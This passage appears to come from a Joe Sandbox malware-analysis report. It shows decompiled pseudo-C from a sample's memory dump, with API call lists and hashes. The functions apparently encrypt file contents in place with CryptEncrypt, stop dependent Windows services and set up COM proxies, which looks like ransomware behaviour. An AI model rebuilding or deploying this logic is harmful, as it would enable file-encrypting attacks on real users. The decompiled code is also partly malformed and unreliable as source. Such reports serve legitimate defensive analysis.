									E0132EABA(_t261);
									_t266 = _t266 + 8;
								}
							}
							_t262 =  *((intOrPtr*)( *_v24 + 0x14));
							_t166 = E012F93F0( &_v156, 0x13a4e9c, _t253, _t301);
							_v8 = 4;
							if( *((intOrPtr*)(_t166 + 0x14)) >= 8) {
								_t166 =  *_t166;
							}
							 *_t262(_v24, _t166, 0,  &_v60, 0);
							_v8 = 0xffffffff;
							_t168 = _v136;
							if(_t168 >= 8) {
								_push(2 + _t168 * 2);
								E012F56A0(_t212, _t253, _v156);
							}
							_t254 = _v80;
							_t263 = _v68;
							_v36 = 0;
							_v156 = 0;
							_t170 = _v28;
							_v140 = 0;
							_v136 = 7;
							 *((intOrPtr*)( *_t170 + 0x60))(_t170, _t263, _t254, 0, 0, _v24,  &_v36, 0);
							__imp__#9( &_v60);
							 *_t212(_t263);
							 *_t212(_t254);
							_t175 = _v40;
							 *((intOrPtr*)( *_t175 + 8))(_t175);
							_t177 = _v24;
							 *((intOrPtr*)( *_t177 + 8))(_t177);
							_t179 = _v44;
							 *((intOrPtr*)( *_t179 + 8))(_t179);
							_t181 = _v36;
							 *((intOrPtr*)( *_t181 + 8))(_t181);
						}
						_t139 = _v28;
						 *((intOrPtr*)( *_t139 + 8))(_t139);
					}
					_t137 = _v32;
					 *((intOrPtr*)( *_t137 + 8))(_t137);
				}
				 *[fs:0x0] = _v16;
				_pop(_t256);
				return E0132EA79(_v20 ^ _t264, _t256);
			}

0x012fb290
0x012fb2a1
0x012fb2a7
0x012fb2ac
0x012fb2ae
0x012fb2b8
0x012fb2c1
0x012fb2c4
0x012fb2d6
0x012fb2dd
0x012fb2e3
0x012fb2e5
0x012fb2f1
0x012fb2ff
0x012fb302
0x012fb307
0x012fb30e
0x012fb312
0x012fb314
0x012fb314
0x012fb31a
0x012fb31f
0x012fb323
0x012fb327
0x012fb32d
0x012fb32d
0x012fb329
0x012fb329
0x012fb329
0x012fb343
0x012fb345
0x012fb348
0x012fb34b
0x012fb351
0x012fb356
0x012fb35a
0x012fb360
0x012fb366
0x012fb36a
0x012fb36d
0x012fb36f
0x012fb36f
0x012fb375
0x012fb37a
0x012fb37d
0x012fb382
0x012fb385
0x012fb385
0x012fb38c
0x012fb38f
0x012fb394
0x012fb394
0x012fb397
0x012fb397
0x012fb39e
0x012fb3a5
0x012fb3ab
0x012fb3b4
0x012fb3b8
0x012fb3bd
0x012fb3bd
0x012fb3c4
0x012fb3db
0x012fb3e1
0x012fb3e3
0x012fb3f1
0x012fb3f6
0x012fb3fd
0x012fb401
0x012fb403
0x012fb403
0x012fb40e
0x012fb412
0x012fb418
0x012fb418
0x012fb414
0x012fb414
0x012fb414
0x012fb41b
0x012fb421
0x012fb424
0x012fb429
0x012fb42d
0x012fb433
0x012fb439
0x012fb43d
0x012fb440
0x012fb442
0x012fb442
0x012fb448
0x012fb44d
0x012fb450
0x012fb455
0x012fb458
0x012fb458
0x012fb45f
0x012fb462
0x012fb467
0x012fb467
0x012fb46a
0x012fb46a
0x012fb471
0x012fb478
0x012fb47b
0x012fb47e
0x012fb487
0x012fb48b
0x012fb490
0x012fb490
0x012fb495
0x012fb4a1
0x012fb4ab
0x012fb4af
0x012fb4b4
0x012fb4bb
0x012fb4bf
0x012fb4c1
0x012fb4c1
0x012fb4cc
0x012fb4d0
0x012fb4d6
0x012fb4d6
0x012fb4d2
0x012fb4d2
0x012fb4d2
0x012fb4d9
0x012fb4df
0x012fb4e2
0x012fb4e7
0x012fb4eb
0x012fb4f1
0x012fb4f7
0x012fb4fb
0x012fb4fe
0x012fb500
0x012fb500
0x012fb506
0x012fb50b
0x012fb50e
0x012fb513
0x012fb516
0x012fb516
0x012fb51d
0x012fb520
0x012fb525
0x012fb525
0x012fb528
0x012fb528
0x012fb52f
0x012fb536
0x012fb53c
0x012fb545
0x012fb549
0x012fb54e
0x012fb54e
0x012fb551
0x012fb55e
0x012fb56a
0x012fb56e
0x012fb574
0x012fb57b
0x012fb57e
0x012fb58c
0x012fb596
0x012fb599
0x012fb5a0
0x012fb5ac
0x012fb5b4
0x012fb5b8
0x012fb5bb
0x012fb5bf
0x012fb5c1
0x012fb5c1
0x012fb5cc
0x012fb5d0
0x012fb5d6
0x012fb5d6
0x012fb5d2
0x012fb5d2
0x012fb5d2
0x012fb5d8
0x012fb5db
0x012fb5e0
0x012fb5e2
0x012fb5e8
0x012fb5ee
0x012fb5f2
0x012fb5f5
0x012fb5f7
0x012fb5f7
0x012fb5fd
0x012fb600
0x012fb602
0x012fb605
0x012fb60a
0x012fb60d
0x012fb60d
0x012fb614
0x012fb617
0x012fb61c
0x012fb61c
0x012fb5e8
0x012fb62f
0x012fb632
0x012fb637
0x012fb642
0x012fb644
0x012fb644
0x012fb652
0x012fb654
0x012fb65b
0x012fb664
0x012fb66d
0x012fb674
0x012fb679
0x012fb67c
0x012fb682
0x012fb68d
0x012fb692
0x012fb699
0x012fb6a3
0x012fb6ad
0x012fb6b7
0x012fb6be
0x012fb6c5
0x012fb6c8
0x012fb6ca
0x012fb6d0
0x012fb6d3
0x012fb6d9
0x012fb6dc
0x012fb6e2
0x012fb6e5
0x012fb6eb
0x012fb6eb
0x012fb6ee
0x012fb6f4
0x012fb6f4
0x012fb6f7
0x012fb6fd
0x012fb6fd
0x012fb703
0x012fb70c
0x012fb71b

APIs

CoCreateInstance.OLE32(01378F1C,00000000,00000001,01378F2C,00000000,39CCA9F6), ref: 012FB2DD
SysFreeString.OLEAUT32(00000000), ref: 012FB36D
CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 012FB3DB
SysAllocString.OLEAUT32(00000000), ref: 012FB41B
SysFreeString.OLEAUT32(00000000), ref: 012FB440
SysAllocString.OLEAUT32(00000000), ref: 012FB4D9
SysFreeString.OLEAUT32(00000000), ref: 012FB4FE
SysFreeString.OLEAUT32(00000000), ref: 012FB5F5
VariantClear.OLEAUT32(?), ref: 012FB6BE
SysFreeString.OLEAUT32(?), ref: 012FB6C5
SysFreeString.OLEAUT32(?), ref: 012FB6C8

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: String$Free$Alloc$BlanketClearCreateInstanceProxyVariant
String ID:
API String ID: 2934474526-0
Opcode ID: 54d2c062eb7ccd647e255ce26d842026c7f691b6eacdbfc98c1307cc80c650a6
Instruction ID: 95e35b19750988b903e80324468de1110dc11663d28fe3b1bcec5c3c8db34f02
Opcode Fuzzy Hash: 54d2c062eb7ccd647e255ce26d842026c7f691b6eacdbfc98c1307cc80c650a6
Instruction Fuzzy Hash: A9E14F70A102199FEB20DF98DC45BAEBBB9FF04714F14416CEA05AB290DB75E945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01309740, Relevance: 16.8, APIs: 11, Instructions: 274
fileCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E01309740(void* __ebx, void* __ecx, union _LARGE_INTEGER* __edx, void* __edi, intOrPtr _a4, void* _a8) {
				struct _OVERLAPPED* _v8;
				char _v16;
				signed int _v20;
				union _LARGE_INTEGER* _v24;
				void _v28;
				long _v32;
				union _LARGE_INTEGER* _v36;
				void* _v40;
				intOrPtr _v44;
				char _v48;
				union _LARGE_INTEGER* _v52;
				void* _v56;
				intOrPtr _v60;
				long _v64;
				char _v80;
				long _v84;
				intOrPtr _v88;
				long _v92;
				char _v108;
				intOrPtr _v116;
				intOrPtr _v120;
				long _v124;
				intOrPtr _v128;
				void _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				void* __esi;
				void* __ebp;
				signed int _t100;
				signed int _t101;
				char* _t107;
				intOrPtr _t108;
				intOrPtr _t111;
				intOrPtr _t118;
				intOrPtr _t133;
				intOrPtr _t140;
				union _LARGE_INTEGER _t143;
				void* _t158;
				void* _t160;
				intOrPtr _t169;
				union _LARGE_INTEGER* _t177;
				union _LARGE_INTEGER* _t178;
				union _LARGE_INTEGER* _t179;
				long _t180;
				void* _t182;
				void* _t185;
				intOrPtr _t186;
				union _LARGE_INTEGER _t187;
				union _LARGE_INTEGER _t188;
				intOrPtr _t190;
				signed int _t191;
				void* _t192;
				void* _t193;
				intOrPtr _t200;

				_t177 = __edx;
				_push(0xffffffff);
				_push(0x1366d8d);
				_push( *[fs:0x0]);
				_t193 = _t192 - 0x7c;
				_t100 =  *0x13a4018; // 0x39cca9f6
				_t101 = _t100 ^ _t191;
				_v20 = _t101;
				_push(_t101);
				 *[fs:0x0] =  &_v16;
				_t158 = __ecx;
				_t103 = _a4;
				_t182 = _a8;
				if(_a4 == 0 || _t182 == 0xffffffff || E01309150(_t103, 0,  *((intOrPtr*)(__ecx + 0x88))) <  *((intOrPtr*)(_t158 + 0x88))) {
					L33:
					goto L34;
				} else {
					_t107 =  &_v48;
					asm("xorps xmm0, xmm0");
					asm("movq [ebp-0x2c], xmm0");
					__imp__GetFileSizeEx(_t182, _t107);
					if(_t107 == 0) {
						goto L33;
					}
					_t200 = _v44;
					_t108 =  *((intOrPtr*)(_t158 + 0x90));
					if(_t200 < 0 || _t200 <= 0 && _v48 < _t108) {
						goto L33;
					} else {
						_push(0);
						E012F7D00(_t158,  &_v80, _t177,  *((intOrPtr*)(_t158 + 0x88)));
						_v8 = 0;
						asm("xorps xmm0, xmm0");
						_t186 =  *((intOrPtr*)(_t158 + 0x8c));
						asm("movq [ebp-0x24], xmm0");
						_v84 = 0;
						_v32 = 0;
						_v140 = E01364FA0(_v48, _v44, _t186, 0);
						_t111 = 0;
						_v24 = _t177;
						_v136 = 0;
						if(_t186 == 0) {
							L15:
							asm("xorps xmm0, xmm0");
							asm("movq [ebp-0x18], xmm0");
							_t178 = _v24;
							_t187 = _v28;
							asm("movq [ebp-0x18], xmm0");
							_push(2);
							_v40 = _v28;
							_v56 = _t187;
							_v52 = _t178;
							_v36 = _v24;
							if(SetFilePointerEx(_t182, _t187, _t178,  &_v40) == 0) {
								L24:
								asm("xorps xmm0, xmm0");
								asm("movq [ebp-0x18], xmm0");
								_t179 = _v24;
								_t188 = _v28;
								asm("movq [ebp-0x18], xmm0");
								_push(2);
								_v40 = _v28;
								_v56 = _t188;
								_v52 = _t179;
								_v36 = _v24;
								if(SetFilePointerEx(_t182, _t188, _t179,  &_v40) == 0) {
									L31:
									_t118 = _v60;
									if(_t118 >= 0x10) {
										_push(_t118 + 1);
										E012F56A0(_t158, _t182, _v80);
									}
									goto L33;
								}
								_v28 =  *((intOrPtr*)(_t158 + 0x84));
								_v24 =  *((intOrPtr*)(_t158 + 0x8c));
								if(WriteFile(_t182,  &_v28, 8,  &_v32, 0) == 0 || _v32 != 8) {
									goto L31;
								} else {
									_t160 = 1;
									goto L28;
								}
							}
							E01309EE0(_t158, _t158, _t178, _t182,  &_v108, _a4);
							_t131 =  >=  ? _v108 :  &_v108;
							if(WriteFile(_t182,  >=  ? _v108 :  &_v108, _v92,  &_v32, 0) == 0) {
								L22:
								_t133 = _v88;
								if(_t133 >= 0x10) {
									_push(_t133 + 1);
									E012F56A0(_t158, _t182, _v108);
									_t193 = _t193 + 8;
								}
								goto L24;
							}
							_t180 = _v92;
							if(_v32 != _t180) {
								goto L22;
							}
							_v132 = _v48;
							_v128 = _v44;
							_v124 = _t180;
							_v120 = 3;
							_v116 = 0x1030307;
							if(WriteFile(_t182,  &_v132, 0x18,  &_v32, 0) != 0) {
								goto L22;
							} else {
								_t140 = _v88;
								if(_t140 >= 0x10) {
									_push(_t140 + 1);
									E012F56A0(_t158, _t182, _v108);
									_t193 = _t193 + 8;
								}
								goto L21;
							}
						} else {
							_t190 = _a4;
							while(1) {
								_t143 = E0132F450(_t111, 0, _v140, _t177);
								_push(0);
								_v56 = _t143;
								_v52 = _t177;
								if(SetFilePointerEx(_t182, _t143, _t177,  &_v40) == 0) {
									break;
								}
								_t146 =  >=  ? _v80 :  &_v80;
								if(ReadFile(_t182,  >=  ? _v80 :  &_v80, _v64,  &_v84, 0) == 0) {
									break;
								}
								_push(0);
								if(SetFilePointerEx(_t182, _v40, _v36,  &_v56) == 0 || E0130A0A0(_t190, 0,  &_v80,  *((intOrPtr*)(_t158 + 0x88)),  *((intOrPtr*)(_t158 + 0x88))) == 0) {
									break;
								} else {
									_t154 =  >=  ? _v80 :  &_v80;
									if(WriteFile(_t182,  >=  ? _v80 :  &_v80, _v64,  &_v32, 0) == 0) {
										break;
									}
									_t177 = _v24;
									_t111 = _v136 + 1;
									_v136 = _t111;
									if(_t111 <  *((intOrPtr*)(_t158 + 0x8c))) {
										continue;
									}
									goto L15;
								}
							}
							L21:
							_t160 = 0;
							L28:
							_t169 = _v60;
							if(_t169 >= 0x10) {
								_push(_t169 + 1);
								E012F56A0(_t160, _t182, _v80);
							}
							L34:
							 *[fs:0x0] = _v16;
							_pop(_t185);
							return E0132EA79(_v20 ^ _t191, _t185);
						}
					}
				}
			}

0x01309740
0x01309743
0x01309745
0x01309750
0x01309751
0x01309754
0x01309759
0x0130975b
0x01309761
0x01309765
0x0130976b
0x0130976d
0x01309770
0x01309775
0x01309a61
0x00000000
0x0130979e
0x0130979e
0x013097a1
0x013097a6
0x013097ab
0x013097b3
0x00000000
0x00000000
0x013097b9
0x013097bd
0x013097c3
0x00000000
0x013097d4
0x013097d4
0x013097df
0x013097e4
0x013097eb
0x013097ee
0x013097fa
0x01309802
0x01309809
0x01309815
0x0130981b
0x0130981d
0x01309820
0x01309828
0x013098f8
0x013098f8
0x013098fb
0x01309900
0x01309903
0x01309906
0x01309911
0x01309913
0x0130991d
0x01309920
0x01309923
0x0130992e
0x013099ca
0x013099ca
0x013099cd
0x013099d2
0x013099d5
0x013099d8
0x013099e3
0x013099e5
0x013099ef
0x013099f2
0x013099f5
0x01309a00
0x01309a4c
0x01309a4c
0x01309a52
0x01309a55
0x01309a59
0x01309a5e
0x00000000
0x01309a52
0x01309a08
0x01309a13
0x01309a29
0x00000000
0x01309a31
0x01309a31
0x00000000
0x01309a31
0x01309a29
0x0130993d
0x01309952
0x01309962
0x013099b5
0x013099b5
0x013099bb
0x013099be
0x013099c2
0x013099c7
0x013099c7
0x00000000
0x013099bb
0x01309964
0x0130996a
0x00000000
0x00000000
0x01309974
0x01309980
0x01309985
0x01309988
0x0130998f
0x0130999a
0x00000000
0x0130999c
0x0130999c
0x013099a2
0x013099a5
0x013099a9
0x013099ae
0x013099ae
0x00000000
0x013099a2
0x0130982e
0x0130982e
0x01309831
0x0130983b
0x01309840
0x01309845
0x0130984c
0x01309857
0x00000000
0x00000000
0x0130986d
0x0130987b
0x00000000
0x00000000
0x01309881
0x01309896
0x00000000
0x013098b8
0x013098c8
0x013098d6
0x00000000
0x00000000
0x013098e2
0x013098e5
0x013098e6
0x013098f2
0x00000000
0x00000000
0x00000000
0x013098f2
0x01309896
0x013099b1
0x013099b1
0x01309a33
0x01309a33
0x01309a39
0x01309a3c
0x01309a40
0x01309a45
0x01309a63
0x01309a66
0x01309a6f
0x01309a7e
0x01309a7e
0x01309828
0x013097c3

APIs

Part of subcall function 01309150: CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0130917A

GetFileSizeEx.KERNEL32(?,?,?,00000000,?,39CCA9F6,00000010,00000000), ref: 013097AB
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01309810
SetFilePointerEx.KERNEL32(?,00000000,?,01366D8D,00000000,00000000,00000000,?,?,?,00000000,?,00000000,?,00000000), ref: 0130984F
ReadFile.KERNEL32(?,?,?,00000000,00000000,?,01366D8D,00000000,00000000,00000000,?,?,?,00000000,?,00000000), ref: 01309873
SetFilePointerEx.KERNEL32(?,01366D8D,000000FF,?,00000000,?,01366D8D,00000000,00000000,00000000,?,?,?,00000000,?,00000000), ref: 0130988E
WriteFile.KERNEL32(?,?,?,00000000,00000000,?,00000000,?,?,?,?,01366D8D,00000000,00000000,00000000,?), ref: 013098CE
SetFilePointerEx.KERNEL32(?,01308D6E,00000000,01366D8D,00000002,?,00000000,?,00000000,?,00000000), ref: 01309926
WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?), ref: 0130995E
WriteFile.KERNEL32(?,?,00000018,00000000,00000000), ref: 01309996
SetFilePointerEx.KERNEL32(?,01308D6E,00000000,01366D8D,00000002), ref: 013099F8
WriteFile.KERNEL32(?,01308D6E,00000008,00000000,00000000), ref: 01309A21

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: File$PointerWrite$CryptEncryptReadSizeUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 609063662-0
Opcode ID: ee0e9c174d04e935e039ec0a768999cc95cc77f40ffd0c3039a6a7b850ea51cd
Instruction ID: 4cd43bf1ce08781b8b2767a4a440cf761586787c7b579e615451e8f5a8adb386
Opcode Fuzzy Hash: ee0e9c174d04e935e039ec0a768999cc95cc77f40ffd0c3039a6a7b850ea51cd
Instruction Fuzzy Hash: 6DA11C71D00209EFEF11CFA4D895BEEBBB9FF49714F548129E914A7281DB70A984CB60

Uniqueness

Uniqueness Score: -1.00%

Function 012FBEE0, Relevance: 16.6, APIs: 11, Instructions: 137
memoryservicesleepCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E012FBEE0(void* __ebx, void* __edi, void* _a4, void* _a8, long _a12) {
				struct _ENUM_SERVICE_STATUS* _v8;
				signed int _v12;
				char _v20;
				signed int _v32;
				int _v36;
				int _v40;
				struct _ENUM_SERVICE_STATUS* _v44;
				intOrPtr _v72;
				struct _SERVICE_STATUS _v76;
				struct _ENUM_SERVICE_STATUS* _v80;
				void* _v84;
				signed int _v88;
				long _v92;
				void* _v96;
				short* _v100;
				void* __esi;
				signed int _t46;
				signed int _t47;
				signed int _t62;
				short* _t64;
				struct _SERVICE_STATUS* _t71;
				void* _t82;
				void* _t84;
				void* _t86;
				struct _ENUM_SERVICE_STATUS* _t88;
				long _t89;
				signed int _t90;

				_push(0xfffffffe);
				_push(0x139c3f8);
				_push(E01345BB0);
				_push( *[fs:0x0]);
				_t46 =  *0x13a4018; // 0x39cca9f6
				_v12 = _v12 ^ _t46;
				_t47 = _t46 ^ _t90;
				_v32 = _t47;
				_push(_t47);
				 *[fs:0x0] =  &_v20;
				_v84 = _a4;
				_t82 = _a8;
				if(_t82 != 0) {
					_v36 = 0;
					_v40 = 0;
					asm("xorps xmm0, xmm0");
					asm("movups [ebp-0x48], xmm0");
					asm("movups [ebp-0x38], xmm0");
					_v44 = 0;
					_v92 = GetTickCount();
					if(EnumDependentServicesW(_t82, 1, 0, 0,  &_v36,  &_v40) == 0 && GetLastError() == 0xea) {
						_t88 = HeapAlloc(GetProcessHeap(), 8, _v36);
						_v80 = _t88;
						if(_t88 != 0) {
							_v8 = 0;
							if(EnumDependentServicesW(_t82, 1, _t88, _v36,  &_v36,  &_v40) != 0) {
								_t62 = 0;
								_t89 = _a12;
								while(1) {
									_v88 = _t62;
									if(_t62 >= _v40) {
										break;
									}
									asm("movups xmm1, [ecx+eax*4]");
									asm("movups xmm0, [ecx+eax*4+0x10]");
									asm("movups [ebp-0x70], xmm0");
									_t64 =  *(_v80 + 0x20 + (_t62 + _t62 * 8) * 4);
									_v100 = _t64;
									asm("movd eax, xmm1");
									_t84 = OpenServiceW(_v84, _t64, 0x24);
									_v96 = _t84;
									if(_t84 != 0) {
										_v8 = 1;
										if(ControlService(_t84, 1,  &_v76) != 0) {
											while(_v72 != 1) {
												Sleep(_t89);
												_t71 =  &_v76;
												__imp__QueryServiceStatusEx(_t84, 0, _t71, 0x24,  &_v36);
												if(_t71 != 0 && _v72 != 1 && GetTickCount() - _v92 <= _t89) {
													continue;
												}
												goto L14;
											}
										}
										L14:
										_v8 = 0;
										E012FC072(_t84);
										_t62 = _v88 + 1;
										continue;
									}
									break;
								}
								_t88 = _v80;
							}
							_v8 = 0xfffffffe;
							E012FC0AA(_t88);
						}
					}
				}
				 *[fs:0x0] = _v20;
				_pop(_t86);
				return E0132EA79(_v32 ^ _t90, _t86);
			}

0x012fbee3
0x012fbee5
0x012fbeea
0x012fbef5
0x012fbef9
0x012fbefe
0x012fbf01
0x012fbf03
0x012fbf09
0x012fbf0d
0x012fbf16
0x012fbf19
0x012fbf1e
0x012fbf24
0x012fbf2b
0x012fbf32
0x012fbf35
0x012fbf39
0x012fbf3d
0x012fbf4a
0x012fbf64
0x012fbf8e
0x012fbf90
0x012fbf95
0x012fbf9b
0x012fbfb9
0x012fbfbf
0x012fbfc1
0x012fbfc4
0x012fbfc4
0x012fbfca
0x00000000
0x00000000
0x012fbfd6
0x012fbfda
0x012fbfdf
0x012fbfe3
0x012fbfe7
0x012fbfec
0x012fbffa
0x012fbffc
0x012fc001
0x012fc003
0x012fc019
0x012fc020
0x012fc027
0x012fc033
0x012fc03a
0x012fc042
0x00000000
0x00000000
0x00000000
0x012fc042
0x012fc020
0x012fc057
0x012fc057
0x012fc05e
0x012fc066
0x00000000
0x012fc066
0x00000000
0x012fc001
0x012fc07a
0x012fc07a
0x012fc07d
0x012fc084
0x012fc084
0x012fbf95
0x012fbf64
0x012fc08c
0x012fc095
0x012fc0a4

APIs

GetTickCount.KERNEL32 ref: 012FBF44
EnumDependentServicesW.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000000), ref: 012FBF5C
GetLastError.KERNEL32 ref: 012FBF6A
GetProcessHeap.KERNEL32 ref: 012FBF7E
HeapAlloc.KERNEL32(00000000,00000008,00000000), ref: 012FBF88
EnumDependentServicesW.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000000), ref: 012FBFB1
OpenServiceW.ADVAPI32(?,?,00000024), ref: 012FBFF4
ControlService.ADVAPI32(00000000,00000001,?), ref: 012FC011
Sleep.KERNEL32(?), ref: 012FC027
QueryServiceStatusEx.ADVAPI32(00000000,00000000,?,00000024,00000000), ref: 012FC03A
GetTickCount.KERNEL32 ref: 012FC04A

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: Service$CountDependentEnumHeapServicesTick$AllocControlErrorLastOpenProcessQuerySleepStatus
String ID:
API String ID: 2237175040-0
Opcode ID: 9b260951e84a67de9dfb016988f3cdccea92fd2bac671af33abd98846c780245
Instruction ID: 2553029e3840156b005085b0cb406da9087d77877d190315609117f979012e93
Opcode Fuzzy Hash: 9b260951e84a67de9dfb016988f3cdccea92fd2bac671af33abd98846c780245
Instruction Fuzzy Hash: F251297191020DDBDB21CFA8D848FEEFBB8FF49700F14812DEA15A7280DB75A9558B60

Uniqueness

Uniqueness Score: -1.00%

Function 0132FAF0, Relevance: 13.7, APIs: 9, Instructions: 154
memoryCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E0132FAF0(void* __ebx, char* _a4) {
				int _v8;
				signed int _v12;
				char _v20;
				short* _v28;
				signed int _v32;
				short* _v36;
				int _v40;
				int _v44;
				intOrPtr _v56;
				void* _v60;
				void* __esi;
				signed int _t30;
				signed int _t31;
				char _t33;
				int _t34;
				signed short _t36;
				signed short _t38;
				void* _t49;
				short* _t50;
				int _t52;
				char* _t58;
				int _t59;
				char* _t61;
				intOrPtr* _t62;
				intOrPtr* _t63;
				char* _t69;
				intOrPtr _t70;
				int _t71;
				intOrPtr* _t72;
				short* _t75;
				void* _t78;
				signed int _t79;
				void* _t81;
				short* _t82;

				_push(0xfffffffe);
				_push(0x13a0408);
				_push(E01345BB0);
				_push( *[fs:0x0]);
				_t82 = _t81 - 0x18;
				_t30 =  *0x13a4018; // 0x39cca9f6
				_v12 = _v12 ^ _t30;
				_t31 = _t30 ^ _t79;
				_v32 = _t31;
				_push(_t75);
				_push(_t71);
				_push(_t31);
				 *[fs:0x0] =  &_v20;
				_v28 = _t82;
				_t58 = _a4;
				if(_t58 != 0) {
					_t61 = _t58;
					_t10 =  &(_t61[1]); // 0x1302fda
					_t69 = _t10;
					do {
						_t33 =  *_t61;
						_t61 =  &(_t61[1]);
					} while (_t33 != 0);
					_t62 = _t61 - _t69;
					_t11 = _t62 + 1; // 0x1302fdb
					_t34 = _t11;
					_v44 = _t34;
					if(_t34 > 0x7fffffff) {
						L17:
						E0132FAD0(0x80070057);
						goto L18;
					} else {
						_t71 = MultiByteToWideChar(0, 0, _t58, _t34, 0, 0);
						_v40 = _t71;
						if(_t71 == 0) {
							L18:
							_t36 = GetLastError();
							if(_t36 > 0) {
								_t36 = _t36 & 0x0000ffff | 0x80070000;
							}
							E0132FAD0(_t36);
							goto L21;
						} else {
							_v8 = 0;
							_t49 = _t71 + _t71;
							if(_t71 >= 0x1000) {
								_push(_t49);
								_t50 = E0134AA4A();
								_t82 =  &(_t82[2]);
								_t75 = _t50;
								_v36 = _t75;
								_v8 = 0xfffffffe;
							} else {
								E0132F420();
								_v28 = _t82;
								_t75 = _t82;
								_v36 = _t75;
								_v8 = 0xfffffffe;
							}
							if(_t75 == 0) {
								L16:
								E0132FAD0(0x8007000e);
								goto L17;
							} else {
								_t52 = MultiByteToWideChar(0, 0, _t58, _v44, _t75, _t71);
								if(_t52 == 0) {
									L21:
									if(_t71 >= 0x1000) {
										E01349EA4(_t75);
										_t82 =  &(_t82[2]);
									}
									_t38 = GetLastError();
									if(_t38 > 0) {
										_t38 = _t38 & 0x0000ffff | 0x80070000;
									}
									E0132FAD0(_t38);
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									_push(_t79);
									_t70 = _v56;
									_push(_t71);
									_t72 = _t62;
									 *_t72 = 0x1378f18;
									 *((intOrPtr*)(_t72 + 4)) =  *((intOrPtr*)(_t70 + 4));
									_t63 =  *((intOrPtr*)(_t70 + 8));
									 *((intOrPtr*)(_t72 + 8)) = _t63;
									 *(_t72 + 0xc) = 0;
									if(_t63 != 0) {
										 *0x1374358(_t63, _t75);
										 *((intOrPtr*)( *((intOrPtr*)( *_t63 + 4))))();
									}
									return _t72;
								} else {
									__imp__#2(_t75);
									_t59 = _t52;
									if(_t71 >= 0x1000) {
										E01349EA4(_t75);
										_t82 =  &(_t82[2]);
									}
									if(_t59 == 0) {
										goto L16;
									} else {
										goto L2;
									}
								}
							}
						}
					}
				} else {
					L2:
					 *[fs:0x0] = _v20;
					_pop(_t78);
					return E0132EA79(_v32 ^ _t79, _t78);
				}
			}

0x0132faf3
0x0132faf5
0x0132fafa
0x0132fb05
0x0132fb06
0x0132fb09
0x0132fb0e
0x0132fb11
0x0132fb13
0x0132fb17
0x0132fb18
0x0132fb19
0x0132fb1d
0x0132fb23
0x0132fb26
0x0132fb2b
0x0132fb50
0x0132fb52
0x0132fb52
0x0132fb55
0x0132fb55
0x0132fb57
0x0132fb58
0x0132fb5c
0x0132fb5e
0x0132fb5e
0x0132fb61
0x0132fb69
0x0132fc2d
0x0132fc32
0x00000000
0x0132fb6f
0x0132fb7f
0x0132fb81
0x0132fb86
0x0132fc37
0x0132fc37
0x0132fc3f
0x0132fc44
0x0132fc44
0x0132fc4a
0x00000000
0x0132fb8c
0x0132fb8c
0x0132fb93
0x0132fb9c
0x0132fbb4
0x0132fbb5
0x0132fbba
0x0132fbbd
0x0132fbbf
0x0132fbc2
0x0132fb9e
0x0132fb9e
0x0132fba3
0x0132fba6
0x0132fba8
0x0132fbab
0x0132fbab
0x0132fbe8
0x0132fc23
0x0132fc28
0x00000000
0x0132fbea
0x0132fbf4
0x0132fbfc
0x0132fc4f
0x0132fc55
0x0132fc58
0x0132fc5d
0x0132fc5d
0x0132fc60
0x0132fc68
0x0132fc6d
0x0132fc6d
0x0132fc73
0x0132fc78
0x0132fc79
0x0132fc7a
0x0132fc7b
